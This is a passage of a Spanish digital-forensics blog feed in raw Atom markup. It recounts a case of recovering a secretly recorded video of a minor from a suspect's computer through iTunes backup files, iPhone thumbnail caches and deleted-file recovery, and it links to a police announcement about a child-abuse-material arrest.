/&gt;&lt;/div&gt;</content><link rel='related' href='https://www.gdt.guardiacivil.es/webgdt/' title='Detenidas 25 personas e imputadas otras 21 por difundir Pornografía Infantil a través de la red Ares.'/><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/5379364157594959203/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=5379364157594959203' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5379364157594959203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5379364157594959203'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/05/detenidas-25-personas-e-imputadas-otras.html' title='Detenidas 25 personas e imputadas otras 21 por difundir Pornografía Infantil a través de la red Ares.'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/S_vho2LdyTI/AAAAAAAABqo/joqZ3I8cwPA/s72-c/Captura.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-5061758487398282100</id><published>2010-05-05T17:38:00.002+02:00</published><updated>2010-05-05T17:43:12.290+02:00</updated><title type='text'>2 PARTE de: Te puede pasar a ti...(Forensics iPhone)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S-GR_DXWbII/AAAAAAAABqE/skvMch_Z-sk/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="109" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S-GR_DXWbII/AAAAAAAABqE/skvMch_Z-sk/s200/Captura.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Vamos a continuar con la búsqueda del vídeo en el ordenador del menor,&amp;nbsp; dado que el móvil iPhone ha desaparecido y por lo tanto no se puede analizar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Los&amp;nbsp; iPhone, disponen de una cámara compatible con los formatos de vídeo&amp;nbsp; estándar&amp;nbsp; y que graba unos 30 fotogramas por segundo en estéreo en los formatos de archivo M4a, M4v, MP4 y MOV. También cuando se graba un vídeo se almacena por defecto en una unidad flash (de 8, 16 o 32 GB). Como es de esperar en alguna sincronización entre el iphone e iTunes se habrá&amp;nbsp; copiado las fotos y vídeos al disco duro del ordenador.&lt;br /&gt;&lt;br /&gt;Lo primero y lo más sencillo es buscar ficheros&amp;nbsp; con extensión M4a, M4v, MP4 y MOV. Tras un buen rato de búsqueda ha encontrado unos 30 ficheros con extensión MOV (En resumen os diré que ninguno de ellos pertenecía al vídeo que buscamos) por lo tanto nos tenemos que aplicar y estudiar más a fondo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿QUE HAY QUE&amp;nbsp; SABER?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Para la búsqueda de imágenes y después de documentarme en la web de Apple, veo que los formatos de imágenes se componen (entre otros) de una serie de ficheros con la siguiente extensión:&lt;br /&gt;&lt;br /&gt;Ficheros &lt;b&gt;ITHMB&lt;/b&gt;: Contiene la galería (carrete) de imágenes &lt;br /&gt;Ficheros &lt;b&gt;BTH&lt;/b&gt;:&amp;nbsp;&amp;nbsp; Son archivos de datos BATHY Recorder.&lt;br /&gt;Ficheros &lt;b&gt;THM&lt;/b&gt;: Es utilizado por muchas aplicaciones diferentes para almacenar miniaturas. &lt;br /&gt;Ficheros &lt;b&gt;THL &lt;/b&gt;Es utilizado para las imágenes de los iconos&lt;br /&gt;Ficheros &lt;b&gt;THP&lt;/b&gt;: Son ficheros de vídeo muy utilizados en la Gamecube de Nintendo&lt;br /&gt;&lt;br /&gt;Por lo tanto voy a la búsqueda de estos ficheros con el consiguiente resultado:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/S-FJt7mlwAI/AAAAAAAABpM/anxWkx9p3D4/s1600/Captura2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="187" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/S-FJt7mlwAI/AAAAAAAABpM/anxWkx9p3D4/s320/Captura2.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Solo dos ventanas me ofrecen resultado, la superior derecha con los resultados de ficheros HTM y la inferior derecha con un temporal del fichero ihtmb. ¡¡Vamos a ello!!&lt;br /&gt;&lt;br /&gt;Tras un tiempo descarto los ficheros HTM , nada que ver con lo que busco, pero sin embargo el fichero &lt;b&gt;ithmb &lt;/b&gt;me va a dar mucho juego&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¡¡VEAMOS!!&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Como decíamos estos ficheros contienen la galería (carrete) de imágenes, tras abrirlo con el editor hexadecimal sale en exceso mucha basura y por lo tanto no veo nada importante.&lt;br /&gt;&lt;br /&gt;Googleando me encuentro una utilidad&amp;nbsp; 'iThmbConv.exe' que extrae el contenido de estos ficheros sacando las miniaturas, quizás esta utilidad me ayude:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S-FTvsyN4II/AAAAAAAABpU/1whah3X5aCo/s1600/Captura4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="91" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S-FTvsyN4II/AAAAAAAABpU/1whah3X5aCo/s320/Captura4.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Y que es lo que ven mis ojosssssss; Eh &lt;i&gt;Voilà&lt;/i&gt;!! Una miniatura. Esta me está dando en el nombre del archivo un dato muy revelador &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S-FXeIbmPYI/AAAAAAAABpk/qfIABRAkx2k/s1600/Captura4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S-FXeIbmPYI/AAAAAAAABpk/qfIABRAkx2k/s200/Captura4.JPG" width="178" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Ya tengo una evidencia (que no la prueba). El fichero se llama IMG_0221.HTM, eso significa que el vídeo está asociado a ese fichero, por lo tanto sé que el vídeo tendrá&amp;nbsp; en su nombre final del fichero el número 0221 y la extensión .MOV (*0221.MOV)&amp;nbsp; por lo tanto si existe el fichero HTM, es posible que existiera en algún momento el vídeo, por lo tanto ¿Y si a este chico le dio por borrar el fichero?&lt;br /&gt;&lt;br /&gt;Voy a proceder a intentar recuperar el fichero borrado, para ello me baso en mi&amp;nbsp; kit de herramientas y que mejor...que mi famoso 'Recuva&lt;a href="http://www.recovermyfiles.com/es/descargar-recover-my-files.php?file=RecoverMyFiles-Setup-Spanish.exe" style="color: #0b5394;"&gt;&lt;/a&gt;'. Tras una hora más o menos, consigo ver el resultado&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/S-GLTsJXzFI/AAAAAAAABp0/k_HaHmsH7Rs/s1600/recuva.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="197" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/S-GLTsJXzFI/AAAAAAAABp0/k_HaHmsH7Rs/s320/recuva.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;¡¡ Aquí esta!!. Una vez recuperado procedemos a ver si se visualiza.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S-GLoeXi9EI/AAAAAAAABp8/lVhoBjtyQ0I/s1600/video.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S-GLoeXi9EI/AAAAAAAABp8/lVhoBjtyQ0I/s320/video.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Perfecto se visualiza. Ya tenemos la prueba.&lt;br /&gt;&lt;br /&gt;Es hora de recopilar información y hacer el pertinente informe. Nos vamos a otro caso.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-5061758487398282100?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/5061758487398282100/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=5061758487398282100' title='6 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5061758487398282100'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5061758487398282100'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/05/2-parte-de-te-puede-pasar-tiforensics.html' title='2 PARTE de: Te puede pasar a ti...(Forensics iPhone)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/S-GR_DXWbII/AAAAAAAABqE/skvMch_Z-sk/s72-c/Captura.JPG' height='72' width='72'/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2719030258528437436</id><published>2010-04-13T17:45:00.000+02:00</published><updated>2010-04-16T10:22:32.528+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Forensic'/><category scheme='http://www.blogger.com/atom/ns#' term='iphone'/><title type='text'>Te puede pasar a ti...(Forensics Iphone) PARTE I</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8RBOTLJ99I/AAAAAAAABno/Ge-CzXZ4UX8/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8RBOTLJ99I/AAAAAAAABno/Ge-CzXZ4UX8/s200/Captura.JPG" width="166" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span id="c3114705-b6d1-4be5-9a46-f3cbc2af04d5"&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Silvia  y Mirian son unas adolescentes de 13 y 14 años respectivamente. A estas  edades las hormonas se disparán y todo es color brillante y rosa. También como  es habitual los fines de semana quedan en casa de Miriam para realizar una fiesta y tomar 'copas' en el jardín (como dicen los mas jovenes botellon privado). Allí se juntan con un grupo de chicos  de su instituto y conforme pasan las horas y la ingesta de alcohol todo  sube de tono. Que si un besito, que si te toco un poquito, etc.&lt;br /&gt;&lt;br /&gt;El  caso es que la cosa se desmadra y Silvia desaparece con dos chicos por el jardín. Pasado un rato y todo de buen rollo, se  intercambian los números del móvil y se van a casa y aquí no ha pasado  nada.&lt;br /&gt;&lt;br /&gt;El caso resumiendo es el siguiente, Silvia fué grabada (¿sin  saberlo?) desde un teléfono móvil en actitudes podríamos decir poco  decorosas. En el instituto todo el mundo habla de que existe un un link  de acceso a una descarga del vídeo desde Rapidshare (desde luego sin  contraseña y a disposición de todo el mundo).&lt;br /&gt;&lt;br /&gt;A estas estas  edades todo se sabe y empieza a correr el rumor por el Instituto donde  Silvia y Mirian estudian. Los profesores alertados por el problema  deciden hablar con la chica y con sus padres. El caso se denuncia en la  comisaría más próxima. Los padres acusan a los dos chicos de abusar de  la chica (en el juicio quedo patente que fué consentido) y quieren que  se requise todas las pruebas posibles que incriminen a los chicos.  Curiosamente el móvil (un iphone, ¡¡con 14 años y ya tienen iphone!!) ha  desaparecido. &lt;/span&gt;&lt;span id="c3114705-b6d1-4be5-9a46-f3cbc2af04d5"&gt;  Esto cabrea a los abogados de los padres y alegra al buffete de abogados  de su defendido, dado que no existiendo la prueba, no hay evidencia y  por lo tanto es muy difícil mantener la acusación, como siempre en estos  casos siempre prevalece la presunción  de inocencia del acusado.&lt;br /&gt;&lt;br /&gt;El Juez, decide aplazar el juicio a petición de los abogados de los  padres para que se haga un análisis de los equipos y soportes  informáticos que los chicos tengan en sus casas.&lt;br /&gt;&lt;/span&gt;&lt;span id="c3114705-b6d1-4be5-9a46-f3cbc2af04d5"&gt;En el caso de que existiera el  iphone disponemos de medios muy potentes en productos como  cellebrite, Oxygen o Paraben, pero extremadamente caros para el común de  los mortales. Por otro lado existen diversas técnicas que aunque mas  rudimentarias nos aportan algo más de enseñanaza para un análisis  forense.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Tras  el previo análisis de uno de los ordenadores de los chicos, nos fijamos  que dispone de iTunes, cosa muy importante dado que podremos obtener  mucha información en el ordenador siempre que este hubiera sincronizado o  hubiera realizado una copia de seguridad con el iphone.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;b&gt;En este caso vamos a ver como se ha resuelto. &lt;/b&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;El funcionamiento de sincronización de iTunes se basa en un  controlador especifico en Windows y Mac que permite la comunicación  segura entre ambos dispositivos, cuando se sincronizan o se hace una  copia de seguridad, Windows almacena estos datos en un formato  especifico de ficheros(si disponemos de la última versión del firmware) llamados &lt;b&gt;mddata &lt;/b&gt;y &lt;b&gt;mddinfo&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Entre las cosas que sincroniza o se hacen copias de seguridad están:&lt;/span&gt; &lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;  &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Marcadores, cookies, historial y páginas abiertas actualmente del  navegador&lt;/span&gt; &lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Marcadores, búsquedas recientes y la ubicación actual de mapas  en Mapas&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Ajustes, preferencias y datos de las aplicaciones&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;La  Agenda y los favoritos de la Agenda&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Cuentas de Calendario&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Fondos  de pantalla&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Notas&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Historial de llamadas&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Cuentas  de Mail&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Favoritos de YouTube&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Mensajes SMS&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Correcciones  sugeridas guardadas (se guardan automáticamente  cuando las rechazas)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Carrete (fotos y capturas de pantalla  tomadas con el iPhone)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Identificador del buzón de voz visual (no  se trata de la  contraseña del buzón de voz visual, pero se utiliza para validar la  conexión. Sólo se restaurará a un teléfono que tenga el mismo número en  la tarjeta SIM).&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Clips web&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Ajustes de red (puntos de  acceso Wi-Fi guardados, ajustes de  VPN, preferencias de red)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Dispositivos Bluetooth enlazados (sólo  se pueden restaurar al  mismo teléfono que realizó la copia de seguridad)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Llavero  (incluye las contraseñas de las cuentas de correo  electrónico, las contraseñas Wi-Fi y las que introduces en sitios web y  algunas otras aplicaciones. El llavero sólo puede restaurarse a partir  de una copia de seguridad al mismo iPhone o iPod touch. Si estás  restaurando a un dispositivo nuevo, tendrás que volver a introducir esas  contraseñas de nuevo)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Configuraciones/perfiles gestionados&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Lista de fuentes de sincronización externas (MobileMe, Exchange  ActiveSync)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Configuraciones de cuentas Microsoft Exchange&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Entrenamientos y ajustes de Nike+iPod guardados&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Datos de las aplicaciones de la tienda App Store (excepto la  aplicación propiamente dicha y sus carpetas tmp y Caches)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Vídeos en el carrete&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Preferencias de aplicaciones que permitan el uso de los  servicios de ubicación&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Caché/base de datos de aplicaciones web sin conexión&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Notas de voz&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Autorrelleno para páginas web&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Servidores de confianza con certificados que no se puedan  verificar&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Sitios web con autorización para obtener la ubicación del  dispositivo&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Compras in-app (en aplicación)&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt; Estas copias se guardan dentro de la carpeta del usuario, el directorio  sería: &lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt; &lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Mac&lt;/strong&gt;: &lt;tt&gt;~/Librería/Application  Support/MobileSync/Backup/&lt;/tt&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Windows XP:&lt;/strong&gt; &lt;tt&gt;\Documents  and  Settings\(nombredeusuario)\Application Data\Apple  Computer\MobileSync\Backup\&lt;/tt&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Vista / Win 7: &lt;span style="font-size: x-small;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace; font-weight: normal;"&gt; C:\Users\(nombredeusuario)\AppData\Roaming\Apple  Computer\MobileSync\Backup\&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-size: small;"&gt;En el caso que nos trata 'el chico' tiene en su ordenador Windows  Vista y en el contenido del directorio nos encontramos la siguiente  carpeta "&lt;strong&gt;0387fecb24b358ec337ab2ad3323fb8e0bbc27ca".&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;   &lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;/strong&gt;Cuando el dispositivo se conecta por primera vez a  iTunes y nunca estaba conectado anteriormente, iTunes generará un  identificador alfanumérico 40 caracteres para el dispositivo.&amp;nbsp; Este  identificador, también conocido como el UDID (Unique Device Identifier), es también el nombre de la carpeta para este dispositivo dentro de la carpeta de copia de  seguridad.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt; En el caso en concreto tenia más de una y tuve que ordenarlas  por fecha para distinguirlas,también es conveniente realizar una copia  de esta carpeta en el  escritorio u otro dispositivo, para trabajar desde ella y no correr el  riesgo  de perderla. (es recomendable hacer un hash del contenido del  directorio). Los ficheros que contiene pueden ser del siguiente formato:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;TIPOS DE FICHEROS&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;plist&lt;br /&gt;mdbackup &lt;br /&gt;mddata &lt;br /&gt;mdinfo&amp;nbsp;&lt;/span&gt; &lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;b&gt;Archivos plist &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Los  archivos plist son archivos  informativos donde se escribe el contenido en XML.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;/span&gt;&lt;/span&gt;   &lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;Hay 3   plist principales archivos generados como parte del proceso de copia de  seguridad - Info.plist, Status.plist y Manifest.plist.&lt;/span&gt;&lt;/span&gt; &lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;strong&gt;&lt;span style="font-family: inherit; font-weight: normal;"&gt;El  archivo plist más importante es el archivo Info.plist ya que contiene  información básica sobre el dispositivo, incluido el, nombre de  dispositivo asignado por el usuario número de serie y número de teléfono&lt;/span&gt;.&lt;/strong&gt; El info.plist también indicará la última fecha y la  hora cuando el dispositivo fue copiado en el proceso de copia de  seguridad&lt;/span&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8RAlyozRuI/AAAAAAAABng/-Xwh0mtuPds/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/S8RAlyozRuI/AAAAAAAABng/-Xwh0mtuPds/s320/Captura.JPG" width="290" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;archivo plist&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;  El archivo Status.plist indica el estado del proceso de  sincronización anterior o copia de seguridad.&lt;/span&gt;&lt;/span&gt;      &lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt; Si la sincronización o  el proceso de  copia de seguridad se completó correctamente, entonces el contenido  indicaría que el backup se ha realizado correctamente&lt;/span&gt;.&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;  &lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;  El archivo Manifest.plist&lt;/span&gt;&lt;/span&gt;   &lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;  es un archivo binario plist real de los  archivos de la copia de seguridad junto con la firma digital.&lt;/span&gt; &lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;Generalmente,  este  archivo no es de importancia forense.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;/span&gt;&lt;/span&gt;   &lt;br /&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;Archivos  mdbackup&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;Los archivos  mdbackup también contiene datos importantes siendo el propio nombre de archivo es un  valor hexadecimal alfanuméricos.   &lt;/span&gt;&lt;/span&gt; &lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;En las  versiones de firmware más recientes para el iPhone, los  archivos. mdbackup se sustituye por la mddata.y mdinfo &lt;/span&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;.&lt;/span&gt; A diferencia del mdbackup que todo el  archivo contiene los metadatos en la nueva versión de firmware va a crear dos archivos - uno con la extensión  mddata y el otro con la extensión mdinfo.&lt;/span&gt; &lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;El. mdinfo y mddata actuan  como un igual y, por tanto, tienen el mismo nombre de archivo, pero las  extensiones de archivo diferentes.&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Archivos MDINFO y MDDATA&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; El mdinfo contendrá la información de metadatos sobre el  archivo,como por ejemplo,  la libreta de direcciones, SMS, historial de llamadas, etc.&lt;/span&gt;&amp;nbsp;&lt;span onmouseout="_tipoff()" onmouseover="_tipon(this)"&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; El mddata  contendrá el contenido real de ese archivo.&lt;/span&gt; 